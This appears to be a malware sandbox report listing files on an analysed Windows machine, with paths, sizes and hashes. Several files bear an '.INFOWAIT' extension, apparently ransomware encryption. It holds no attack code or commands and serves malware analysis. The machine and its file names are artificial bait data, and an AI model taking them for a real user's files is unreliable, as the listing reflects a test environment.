C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	0.22 KB	MD5: 9aa7beff69eb1ea4b633bcd5cd6b2fcd SHA1: b2b7b56481a66900caa24136ca29b6388b0a74d0 SHA256: 689a36e501047514f0628abf34edc77d7ee81b8ea233a015b1cff8b56d6b3864 SSDeep: 6:afwSkeMRRkPDz58dz6vtkhxcstYS3ePZqBP8bwAgO3h4:qx0Hk7z58Nhxvxvqc	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\POzUPkpR60DTM.xlsx	46.74 KB	MD5: 547e407b0afe0196cf73bbb52f509cd8 SHA1: 988292f1f9ea1caef35f9db45dd9059b51660f55 SHA256: 8ff1afe8c3cd546a4c434414aa4425104362785c35f048bf284e9a0de8f72d00 SSDeep: 768:6G0Dy5V/nno6zg5iINDNmBAArcZkm9gtDC4m8xkVgHeI1UMbuJdzHW0K1sYaBqPh:6G0GX/no6zAOukmlz8xHu+uvL020c2Xx	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	0.82 KB	MD5: ec7078f4002b29e214aeb966614c2bbd SHA1: 20381d7fb985b037b8e8ac07dcc4dedc520a1204 SHA256: 8a5078fab5b4d6da866c34b03cce5c6e521268948ee24b1b99c738c659b6d7f7 SSDeep: 12:A7+RjscLXG7HscXEdTtpRAohXORc+D9HM7s2HC4B888LsWWNS0D8L8xdz/j:327McXEdJpLhXO2+L27B888+SZ4	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\8E9H31N.mp3	39.80 KB	MD5: 990abfd7e9084d1a3debf0ffbd2f29b9 SHA1: fcc1baf33e2861b6241dc60d42e5ef42ed97dbcb SHA256: 1f750a44ca8065c7d0431622986c1b8d9e0702a0bafcf2e3af3abd0081253e53 SSDeep: 768:8h+Dh27s37XQmeMfi4R+ohFzeY0PN4HGmmlRKB862yJYkd5Wo9Od4yH:t1XQm364NLzeY0PNmdmq862cYktx4	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\OFFICE\MySite.ico.INFOWAIT	24.62 KB	MD5: 7d99554b26dad5a09d87d60feec7b79c SHA1: 970aed6e9e2d8d0a96b999193f3b6ff5c392adc7 SHA256: adda5d3201da9d01c34fb00c5c2fc51add5511fe17cdf21c0ee3ef7924c43362 SSDeep: 768:Mu0Qp6Zdjwn7AZX+1RFoaYAJSw2n+v/kF4soh:sQQdjw7Al+1RilySwp/kF43	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\O89VrUgck0WGUK_Y\Hz-AF2m p5AxcZJOR.mkv	46.88 KB	MD5: 034e3460aea5973c8ef22f36895f5d15 SHA1: 8629ac2cc3be8041a68bfab0c825c6d6f9049b6e SHA256: ace4b7cdf930e7fbf6c566a7736241ff0254402edc69d262596aff4f040a3ccc SSDeep: 768:YKtLUoNuuSrjkP2KwAag7H5U2E2TcK8+Xl+UB30clpDYzCmUTib6BedIxQGAVjU1:YoLVubkjD62Um0E0Sq6BD6MHh	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\JAPSpnBZPTk8W3utGB.flv	80.49 KB	MD5: d5210b0575fd77695438be74990b281c SHA1: 9fd302e941d5c85db5567b018c719f9c3bbf2549 SHA256: dfa395608619ec251ec2a2e16d00a0c8c3059669263f8251ac7b5f742f2853cf SSDeep: 1536:jYfsUbWUOBgIBTFjruiJ0qa5zN6iQW9KBsvJvRCq/s8kzevcCBOL6:sHuR5JSpNcW9KBsv5EIs8kzi66	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\mF_q7P7.swf	4.63 KB	MD5: e523db425153a5798acf11c823785e64 SHA1: 6f30c16af0ea454fcd8d9fc59718b564ca8bbfc7 SHA256: 63f417a3be51097c2f1712083928583af8ee2767a5ed233c9de0b29ff3e07bde SSDeep: 96:d6LbsPAlpBryteDKDr37y/wW5m+N4WDkvcrvJyoFAQ2asT:d6LbsCr3DWy/vhN4Gkuvia2	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MKWD_AssetId.H1W.INFOWAIT	217.50 KB	MD5: 3a5d120dc4aca144e7d94e0fad97fa36 SHA1: 754b5f4644b7f29af6bc879e411266515df1b64c SHA256: 4e429fb68ae26e8839246155a7f6c49243aef74126587a51ba1c26c56174ae23 SSDeep: 3072:cWJWeFD2jz05HswZjZ/RGhFvWDflEOp3UFOF1C3v6yLZSDYu0YiESYad/A51G6t:329wZl/iFODEFOmSsZi0d/JA	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\kJFrd7NImQEQs.m4a	89.85 KB	MD5: f94cf9584a7ea2195f9b91ac4d6f9ba0 SHA1: 102262910bd16a28647866c43f8097af6957e876 SHA256: 72f8f05e03fea3fa1b2aa74b49c58caf638d60a95a8a73db1efddb46ceafad15 SSDeep: 1536:GjjeFzBeEsOoEcFDD+l2v1UAvUfI6pPOr3xrafojy0Pv3CjCMhkZNjWZO6OdvLw:GHew5Ex4v1Tvg5euwjy0Pv3CjCM0jW0C	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\M3mvj.m4a	96.67 KB	MD5: 3bb1fd8a83d11cc1586c99cf8bdd2916 SHA1: 32db97bed36e0682a35bdc51231a85c2590a6d39 SHA256: a5978ed963a5230f860cbb56c0d903af3297261c7d85dc5e6f73a519302d7f51 SSDeep: 3072:cSJYgGMCsMXtEPAI9xnbyx9w198Gmi2l68e7:+tFtEznnbyx9E2wV7	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat	32.00 KB	MD5: af313f0bd66b8a14613509d051ad4e9a SHA1: 93a043e3c39ae0d83c4fb9a91826ed5d7fcf982c SHA256: 4048636eb5c6462e8c6c095802ae85741cb2224ff2cc0e424f7bd33f5d6a5087 SSDeep: 768:t8Wr37qMWe38wDxUuKugphTjO9yF52bXmqaohC70COE9O6LvEYsTcR:t8Wb7qMWe38wD2vu8VjO0WmWC70XicZA	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8oeI6XU5 vjIz.avi	51.28 KB	MD5: 5bc4314510ce1691bebdc5a8df6fa25b SHA1: e800902a8f1219253ffa6072c94aad7dbc84a99e SHA256: b2a41a6fdd9a805af700156e2c7bc0523bb8c18f9b87641e615bc175551195f2 SSDeep: 1536:zottfiUrADsBBqTPfzEfwytQAL/OaMW6D7qf7SnLjFzb16PCRS:zYtfiRw2ExQA/OJD7qfMjFvICc	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\IEv7z27qsVTekHpr.bmp	83.15 KB	MD5: 70a930d0db315e7b839eee7f667328c5 SHA1: a514d352ffe517102437be7f6749ba7517f6a6ab SHA256: e8aa0cf5b165875b3dd2cc5b0786d77631eeb1976ca4b473083dcd94045aefa4 SSDeep: 1536:eHeB4nvqIMjRyjt2E8ZVpX027vENcVkg6VzvkBjaQsSLrZ8qQ:eHq4nvqLR0ngV9l7ecmg6hvkFXJR8j	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\tkO6bl.odp	72.50 KB	MD5: 0dddc271422c44b67cf0f7da4f15d87e SHA1: 32a4d30a349deafaf15529017b53b61479ee3a6a SHA256: 866058b5158cae85bf11e47816ae06d670b3b98d124c25ac33140f02a06ab2c3 SSDeep: 1536:bp/YCvbYwH1BpNW17vqI11AknFVL7hUkuacPCRqhAagqwT+jIvOIJTWjMLU3p:t3DYwH1BpM17v/3/nFVJUkkCRvqwT+JV	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	0.13 KB	MD5: 3226d49b2e883791c8c235930573aef1 SHA1: 495dde4429f150e6e258d81e742e2854c0153891 SHA256: 3c22216e7e1f1d867375f055022bd8fabbdffef2f838883815af74507f135168 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0VWjus:afwSkeMRRkPDz58dz6vtkhkW9	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\0XQBmq5ckaU.mp3	51.76 KB	MD5: c1c15ab2218c229daaa135a50192d6f9 SHA1: 8881dd50423b5556a7ae2d6234a48a50607667c4 SHA256: 56ad5b2d265ff4e957f6fdd5db02df9e28ddb2557062b33a092c4d34bc855f40 SSDeep: 1536:hWBjuaMtDlrVIH5MLXHRsQpQH8QdxPf98HOuCX:hWBErVIH5MLXHRDWcQdhQMX	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.POWERPNT.14.1033.hxn	0.34 KB	MD5: ade501aea2d5c476561c5d38f2d3b036 SHA1: 1856432c18e61a43c5a6b9013ac757e77a62825a SHA256: a07deb28a292a02e1a6feb40ba9146e041e81efbf013999a59acfa987dfc70a6 SSDeep: 6:gn9+R19FKs6MmH6WM9356uawQkCqvm2f7jDbDy8JImcI35mWTap:K9+XF6RsY9Nqvm2fPDbDBXnTap	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\Hx.hxn	0.38 KB	MD5: a1c2a6f5427cdcb2b9b808f8de27e6c2 SHA1: c5e79634929589b0494c3ed2dfae3b61193d77d5 SHA256: ec5edb69f46d5ebe76ec0f6766bd1acde68997c97015d41aeaf15c494142765e SSDeep: 12:K/B7SZkjamfW3P6WZcMiDm5EKCAP6SWmVlXQu6f:K/BYkjawCF2FKWSpif	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	568.10 KB	MD5: 2362eddbe4b922880af9a87d2f984f86 SHA1: e03cb27404dbecccb13843f2613c0edc68a7c374 SHA256: cd5075db7d89a7ec60acd45eb70e7b2a4a83002fc9cc3809e4e12b53b44648b9 SSDeep: 12288:iUivUNxhsOOQCSHvf8Y4hyMPezVNK9TcS5RyjDUI6Eh/MOhTh:iPehWsMPgyTx6jDUbE2Id	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\ya4k9CP4ga90mFZW.wav	18.91 KB	MD5: b710f71efac3345d7f735163da61db66 SHA1: 8ba69f7d6792f9d4cf953158e92739c82aeddcd6 SHA256: 6fbe14f82b523e0ec2001e5d13086362b69dc3687eb15ba17d0d710f9eeeeac7 SSDeep: 384:g9vZyn0s/6j8oAF4H8BOyKlIyab5QV+BOqDuKk6Wj+id1ToC7S:g9vZyBijRFdIy6LBOIWKn	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\SXoi3O7UHlm4-KqaOQbg.avi	86.52 KB	MD5: 3cec3b51778fd1de3bbfe97ec879490e SHA1: bec57f13001e596d1300f0c79baab6eabb314e64 SHA256: 854da9ec0d29746f61364059ce15d62bb7058a4de2c3079c73dfe1766a856c80 SSDeep: 1536:XnSEO0U3iraz6kV+S+HKz6/s4wTtXAAbP2PHjItYJyy1LxCAjFdmO:3NO0Uyraz6e+HKtbX1CP8tIyy1xh8O	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\IMEhPArBi5zDx-qN3xQn.png	74.21 KB	MD5: be7a7b0639c35531d68b178d2c88a34a SHA1: b2080ffe2ceb07866955018f851f04a2eee17690 SHA256: 50f211134e2595550c06c7338187078b714cfcd28d510a9568e25e3bb9be9312 SSDeep: 1536:BOnHpf9jjp86UfdbGiQ9z/tyGok3o+Weu6MTuhNwCXGI0F8FEXWF6d:2TqVs/tyGm9/TuhNLXGZF8FEXWg	... File Actions Show Properties Download
C:\Boot\BOOTSTAT.DAT	64.00 KB	MD5: cc231cdcce8e6badfa43782c660b14c4 SHA1: 95174af3f15c23c2045c57bcfc42c29d50b6901c SHA256: 079c79bd6ec580c88c316e38e5aa3bc514055872483e91deb7c7496c444e59eb SSDeep: 1536:kbWb7qMWe38wD2vu8VjOLCGi9aWcC70XicZMAqhFgOfYEhJrqC9V8:2WJWeFD2G8ILChmRZ6hFg4RlqC6	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\u8Rrvn5zJ.jpg	93.65 KB	MD5: 19ca4ce9fc1ed17e5a48533007fc82ab SHA1: 752e79a46bd55d7c16b1cc19be1d126057063c25 SHA256: 96bed7a236ade6e5bbcb0a2410a0b6eacd198094628a42df5cba7e359a9f8959 SSDeep: 1536:yYkZu+J5Btc3erUmqyn0tiJ3Yx99h8enApADwQ/2nA3nIuFuDRpXGKxfM6IwfWmZ:yS+jBMerUq+ixKsuDwQ/9YiujxZDWU	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	0.13 KB	MD5: b37a690685351a81b58d98e0a4422eb7 SHA1: 8ed08db4c4f84e974fe30335dfea1db89c0e4705 SHA256: 898e566dc179706c475ea56ff31f9e3df23c83931083d48b91650b8cd879ec2a SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exubR7s:afwSkeMRRkPDz58dz6vtkhpw	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\H2j6tPl2-Uy7a_CTb.docx	68.63 KB	MD5: 61499e565c02f1657e098969493c7db6 SHA1: 5a9323987308780f65533d90e1ec1b6098bf4245 SHA256: 88fe931104af8ada1ab7e8f9d03b0ba9121841a6f94ea022e0e655c4fa7ae772 SSDeep: 1536:L5y/YyjGm4JAHrF50NzBA4Nv3YpGW30f+LWfmJEENEMwX601L+RQ:o/YyjGmiAHrF50rA4Nv3Ee+GJMwXl1Lf	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\8B9CArYYR-k5_6.jpg	7.78 KB	MD5: c32ffbea4d55745b851a9c7a0da598f1 SHA1: 878a3ad223f3ff45ce77ae3dc8cadf02f70274d0 SHA256: 1ab9b9c436453ae8e2f0189d133cb28b336e933e2b2742681225fc56e5b49e40 SSDeep: 192:Yl7+wtneN9flQIAPpDh1/LB4Hzy9HteUUkAg0ovxx4Xs8O:/KebfxAPpDvLiy94kTTvxx8s	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\U eCzQsa89w8ys.mp3	31.85 KB	MD5: 58d7135077b810fed1354c2823ae339b SHA1: 60e89aa79860200758226c7ad759033a6d3474bd SHA256: feddbb4cb9de6c01fe5060a40b46f1e6ab65a321f5da23e148be32eba38e3161 SSDeep: 768:osVYDdXOXduivoD3MthAKdeUHavl5TKH+oBdXlPnbEIr/JiFs43y:os6qw2t6iavlwH+Izbbr/JgC	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.VISIO_PRM.14.1033.hxn	0.34 KB	MD5: 8cb1c44b04ceb4483e246a13f9bf27f0 SHA1: a37eabd7d9217bbfcfd2f391ac60f953b4d3264c SHA256: 229eb38d7a293df3bb11b041ca14e82ab5ff40be51464a67de1072109a7a9f11 SSDeep: 6:gnZ4mzPHnfhYqeuYq3WPm8eWZcmIDTn3eb4zCp7zJmTSR08DRUS:KvzfsutWPOWZcz/C/ApUUS	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat.INFOWAIT	4.00 MB	MD5: 6732b6ff214d6ff85b552c42ec2050ee SHA1: ca686f4a781ce9c4b5e2851cc45f5005fc9b4cd1 SHA256: 9752674a39b1e38d421e2fce6cd89107878a81e28081b41af4b7603c58624170 SSDeep: 3072:hZKWeFD2G8ILChmRZ6hFg4RlqCJbiatNDXxAdZ1dfGZn3Gqa1ZH+p2I7dxz+tET:hZKSlSZSFJRl3BrDXxAdnIGqa1ZGz+	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\-x3FnD.avi	32.72 KB	MD5: 49eb88520c604609e829d24ea15c8705 SHA1: cae4aaf39f5374ebe9259a4a3a16f9840899f8d5 SHA256: f5d605a285a2f3760e2d9c1d3e04313e48546500f18c23ff22c8b3d8f918f617 SSDeep: 768:pb3WbSxq8qR1QMVBaGkajpuJ6K3K1dUKNYnAdFBvVtWVJLXoH:13R1MV49r3KMKNYAdF1yLDs	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.WINPROJ.DEV.14.1033.hxn	0.35 KB	MD5: 63e208994b1dfe7690ea913a347bd8d1 SHA1: f39f4871ec8e9206c745c05dbeed7442303702e0 SHA256: 8f995038cb125a309989c6235c8b75c43f4d8a264d64652feb9861efba307d7c SSDeep: 6:gnCa27/re0qMlDtpJ6K7pD+ZifNHZnHjNQseFu0+VQ+DypUqwi92y1MeUqd1:KCai60qutpndiIFV2sezB+DJbi9V1qq3	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.OIS.14.1033.hxn	0.31 KB	MD5: c55cfb77b6b499dad4583d484795dbc6 SHA1: 58d806b7145ec06496aae7fcb1c066d4d6c2e039 SHA256: f357f6355e0f0f81e7738a1b324d356bf4eea89dcd69e654e110d9e67b8329b4 SSDeep: 6:gne3CmLS8K4UDUVCQp2AVcIiHsmyUSvjzvCtCTnNPG2Cm6hlov:KBmLS1UVCnscxsDtPBXCDls	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\Ukc9zVsmz.xlsx	50.64 KB	MD5: 78959d5277f8f6aba168ab09d6c7569e SHA1: 22c4ca4f5b6f34726037d2d026df695f6e087e11 SHA256: 923da694f294728dd497b772ad32b93d9d5c211756bd73cb9926de651c17d0b1 SSDeep: 1536:64g4AFhChTzqHrvboWv6FHcxigRoYr/kiEIlhjw85:lrAKhAbRvjxi3YLkiEIlSQ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\NBd6m3qs3.m4a	72.48 KB	MD5: c33accea83444beaa147454b5013e00d SHA1: fafbd68143ff22c473a76337e55f163c8ecd2a82 SHA256: e2f33118e6a0d7150086f9a34944e42fdb20bd969a611c2686d410fbd496ad2b SSDeep: 1536:xCgH/wrHny0Rgiwd/qs9jo/t56ZK/K3RySBpPUf+FjaW:gg2HyllLaBKBy4usjaW	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\4haF6sPbyW_.gif	26.67 KB	MD5: 6e2ced5d820b8ae55616e549a902b00e SHA1: beabce8c47433d97cc0a2eb9bd9427727d9bb21a SHA256: 5a87286909339cb1fb15a9f9fa9391fdecbcd77984429ac979d46ce77741cb1e SSDeep: 768:diHCpYJG/k5whI6yu1Sgq3CA1a/eWBAvEhClnZ6cS4Kt:diHyJMwhI6p4r1yeWDEZ35a	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.VISIO_STD.14.1033.hxn	0.34 KB	MD5: 54700a5400b79473481ed7dfdeeefb5a SHA1: 16aa9439cb9236fcc9041fd39023de94b4c03ecd SHA256: 15a2307c7ec48bedace193641db66f02d1b9385448e0fcb78bf1ed02b5d7d22c SSDeep: 6:gnZ4m9DmDqYX/Q0q3WPm8eWZcmIDTn3eb4zCp7zJmTSR08DRUS:Kv4j6WPOWZcz/C/ApUUS	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\y1w5ZZtxeCJCqVDGm8rd.wav	91.82 KB	MD5: 60a46b6d6b9d71c66b7eb3e497603f99 SHA1: a18cbc8a7b5345953805dd062accb5f386ca154b SHA256: 0b111920d7fbeb143c0754776efbaf61ef87698acbc954fdf28c9d88ae1bade4 SSDeep: 1536:Oyji3b4sKcKfkj8ho2auyfG5BOQYWJ6j0uNN+cbaQYEdxUssKqBM:OQi8sKPMoorGzhJlA+jbEdxFP	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\5EP3zi8p1_ R.mkv	53.58 KB	MD5: 924364df9b9bfff8a3cf594b5c8661db SHA1: d30d14761f4f812f818dccfd8899a0c6bfe58257 SHA256: eae44aa7a8e63b5598fad18aab6c746dad0c27aa55b4ea27bf3ebe393749761c SSDeep: 768:eFbWK3F+YVxtnAqjfi0QISRRuHtZkNZa+mYwVX8Y2m5ETOTDiUZJkAO+igJvOg3:g1hAq+0xLNQZa+mlX8Yz5nTWUrkoHv53	... File Actions Show Properties Download
C:\ProgramData\Sun\Java\Java Update\jaureglist.xml	0.12 KB	MD5: 9bbe5e2553f61466dbd6ddb5bc1b636e SHA1: eab023b4d06318e2ea8bd77b6f88e4f4c5a73125 SHA256: a7efc3f4f3b217d2d2b11b332390f210c04c90479dc35d69d0e7e06aaa69d592 SSDeep: 3:9osouP+bCIzdcd1YrLN5l9kL/OJdMF7VMMEJvLLrOU9Q1n:KuPWLziSflaLqMBeFxzOUq	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\YfljSHP679zr.docx	60.42 KB	MD5: e12b12d231be20c27a2822674cd161fa SHA1: 411d430242ef3d3e885fc33c5b6daf5cf43683fd SHA256: 7d89f7bff1a4e9c8dfff5171e368dde64c5ca8d0c7cdb0cdb953032dc6dfd2ca SSDeep: 1536:L6l+eNpMk7vcwAGvArzv7zUR5CWKr3tUHHJpKWDmpzp:be/MSvPAiavPMW7tEHyWDuzp	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\b ZEoraAV.wav	1.86 KB	MD5: ec638692fb2b6b221737428b6266ced6 SHA1: 0928b978dab83f3552fc9967fb32f331aec1b87a SHA256: 37f822aec1e0df7352b583c76d332bf3d7782764da7f6402e9f7441abb61b6d7 SSDeep: 48:ZdAC+NdZH55aITdUh9Yog6Invyb4iu6XWviO169:ZdA3ddvvFn6bk6vO1O	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\O89VrUgck0WGUK_Y\Hq-306b65BqrHoqbR9.swf	47.56 KB	MD5: 0aaedb5281d160e74a6a0a6d513164ca SHA1: 8813ae7dbe082339e5597c471ce5e4547ff98d5a SHA256: 04d945bcc6b461e68dc3d2c547e85f43d454fa5045cdac16c0d1e937cc61277e SSDeep: 768:d5fAQ/m7AFTYFa4fQYEx/GgKxtGZpdBYAt/Oc+/o4H0cMhTme9rdCKjv+zZ3cmRq:dhNjFT1AQ5JwtSpvFOc20coTme9rdP+g	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\l8fJ\p2jEbzbiEY.odp	31.41 KB	MD5: 4a0e85af3204bece69e4c3b42a64036e SHA1: f3ec830d7baeda51c9a4ae06b82eec78dd822b0c SHA256: b70c5ac51f8d52e61a846aaac6ee62acd0c0f87a957d6c236e0b6fb35170ef34 SSDeep: 768:mZptnPW0h/1FbaZ0ikmZDi2vxbQ9unerUvK:mbtPn1FbaSw02vxSdrQK	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\k-DDYba4e9vKH.png	31.27 KB	MD5: 1a4525a565813e07436bc8ad3f7b07ca SHA1: 0ad0c7aada2d9e0bdb4fb550027bf88a69a61bec SHA256: 19b096cd983bccd4d4ab2631be69deed023fafc97f2f8fa45d9a34f9e3fa6761 SSDeep: 768:BriPo+JBF8UnPgMaOdzQe8iTvd6rjetpC/gEceuQ:Bx+lvmO6LrjetpBEcg	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	1.15 KB	MD5: 7c3d9786819fde0950c60f96679e2777 SHA1: 64f987414fd5300166847000d680fe5fd17cc7a8 SHA256: 636b7fd1fe098ca99e29f6bfb010deaf3550aa211f4bd6bc6d9f5c732e92fd63 SSDeep: 24:ILozN0UmhL6Kusu9lhItm99VJPs5mfEXugaV2GpXKP0k9h+VOB1a5Y7Gy:IgLkCX0Srt3s+gSvql9Ig1AY7d	... File Actions Show Properties Download
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim	10.00 MB	MD5: 5205d14da671fcf74a39ce3bf98b53b7 SHA1: dd53b01868653ff10040f8b1b25a6e58cf20da8e SHA256: 99efe9a48a960a728ef50134f3abc2844fc20af4f5382b26c67407bd836e40ee SSDeep: 196608:xQbHCwJ1oXgdL+PUl6xqojQRljrffo1feRTC+JO7MAVgqBpiTGWs:xUCwJ18yL+cl6ZjeljrffowRxMMGciWs	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\FiwjPlFCBQK4Eudei\S6KMJ lP85NJg.ppt	58.49 KB	MD5: 82683f778633cf84d510550a2eba6c91 SHA1: e71660c11b52f112828ed408cbfb5800f8e3da39 SHA256: a40d1ea26bd0d50806ce4b2a25ad6aeb895517a9e1e7d1978131cd6763fac547 SSDeep: 1536:f0F5Y28UuQTf2EwgA57CPm+GihK6T8T7F+npZLl:fn285wfWQm+GihKpfF+Z	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\3w7z.flv	36.89 KB	MD5: 92a6836b01eabee9bad6815e7adef281 SHA1: 0acf46fc3291e71cae4aaa5506ae2eb0a181dd7e SHA256: a2eae14a1559043931addbceef6e9f80a5861664af29e1ed42c7bfa68ed5a5ae SSDeep: 768:he1PhxpRUX+UcWbCGq194Y6iq8IYUmliN4Zuc2vzdM/Ih:haRUOWbCD1949iqvYSvzdxh	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\C0QT-PiM3F.pps	10.03 KB	MD5: 07eaafec72821953476f1ca0bfa1b45c SHA1: 7d62290140691eccb36d8342c10667e293e201e8 SHA256: 7d8e8b1c9b22f9d1c3c043b6f2870709d678073dae42c42c3ffff076c5ed5d72 SSDeep: 192:xXQhIGijLhwMWE3E5xjyMYDCbViPgsYxFzVBZncDL1rNw1L:xgAjWE32YDCbcPmFzVudE	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	0.70 KB	MD5: bc80aa5e7547e2f617b274760cf267b1 SHA1: 98725574c03e001c9d14d4feb4882e706cdd898d SHA256: f37e4d6cff7e86705bad0fb6ed475c18cef8a9c55c46b88dd487c2b3a195e504 SSDeep: 12:cEXFFrkAk6FlMOfHA8cT9SmnoUHDUuoQSNBLNcAxpAx5xuTXCMKIngHKP9SnjS:cMLwwFZHARxSJCUT7NvjAx5xuDx+W9sS	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\6R9e9hJWmT-aPrPe.avi	54.44 KB	MD5: 7047bb60e8cd06b95fd1126f035c77eb SHA1: e0c0dc3710f42c2b133b3034d40e8e21728ceec0 SHA256: 99f2eadeb6e87682cb5d8a46f390bbe2757e4fa5a028c82e10354bff97aa9b70 SSDeep: 1536:auMr9IcLqDmpqSICa8qtjHpPiPrMM47uXy/fwbTj:auQIcLbFIOqSPrOA	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\OFFICE\MySharePoints.ico.INFOWAIT	340.79 KB	MD5: f40123db79995301ea73cd6eb473b722 SHA1: 3d382f2d3d0ca2c70289327a7d6f4876fda9ab0a SHA256: 0f83363ee8882d969f41cc7b815a9c2d9927612242773adef9b3c458ee64aa6a SSDeep: 3072:led9G825X7QPjp9i/vhxbJVV15kL31VJhGgPfPeGVYRJRAETGr7t0uSAAdZdAd/x:lejAMkJxbzV63G+Pelvk	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\frr7vMqqzTzgf.pptx	29.55 KB	MD5: fde99c456904308f5a6167ad369223d6 SHA1: 7a3ee56a4b7636ae91b2cd5c38becbcebd0a0c79 SHA256: ae8186578d3a7ac3a7bdc5c616cc9320cacacf60cad7f0439ee1fb7809f712f4 SSDeep: 768:o5l+T2d4Uax/T12MRWjkjcloTqa89VMejysrH6v86RO:o5FdEtqjmc6TqaGdOsuEr	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.MSPUB.DEV.14.1033.hxn	0.34 KB	MD5: eee43f198379ad5fde5605d860789b15 SHA1: 73d5d7548da18731e08627d59602ce9a277194cf SHA256: 9279f4858b1a383d7d444e2b2eae2e31d2659567898295d5e9e82fbd3aaf519a SSDeep: 6:gnZ4i1+HWtGMctUnYq3WPm8eWZcmIDTn3eb4zCp7zJmTSR08DRUS:KA2MRSWPOWZcz/C/ApUUS	... File Actions Show Properties Download
